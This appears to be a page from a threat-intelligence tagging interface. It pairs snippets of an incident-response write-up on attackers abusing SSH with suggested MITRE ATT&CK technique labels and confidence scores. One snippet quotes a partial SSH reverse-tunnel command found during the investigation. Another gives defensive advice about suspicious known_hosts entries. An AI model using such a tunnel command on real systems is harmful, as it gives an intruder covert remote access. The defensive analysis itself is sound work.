“##s. there were fraudulent purchases made on personal accounts from their work system when they were not at work at the time. when initially investigating, the client determined that there were remote desktop protocol ( rdp ) connections from their domain controllers to the endpo…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1021.004SSH
85%
“. threat actors know its power and versatility too. it is more capable than just logging in to a remote server and interactively running commands. take the command we found during this incident investigation for example : ssh. exe [ email protected ] - f - n - r 50000 - p 443 - o…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1021.004SSH
79%
“at all of the known _ hosts files in the environment. when ssh connects to a host on a port that is not tcp 22, it will put brackets around the host name. in most environments, brackets in a known _ hosts file should be considered suspicious. please note : the screenshot above is…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1572Protocol Tunneling
66%
“. threat actors know its power and versatility too. it is more capable than just logging in to a remote server and interactively running commands. take the command we found during this incident investigation for example : ssh. exe [ email protected ] - f - n - r 50000 - p 443 - o…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1098.004SSH Authorized Keys
47%
“##s. there were fraudulent purchases made on personal accounts from their work system when they were not at work at the time. when initially investigating, the client determined that there were remote desktop protocol ( rdp ) connections from their domain controllers to the endpo…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
Derek Banks // Living Off the Land Binaries, Scripts, and Libraries, known as LOLBins or LOLBAS, are legitimate components of an operating system that threat actors can use to achieve […]
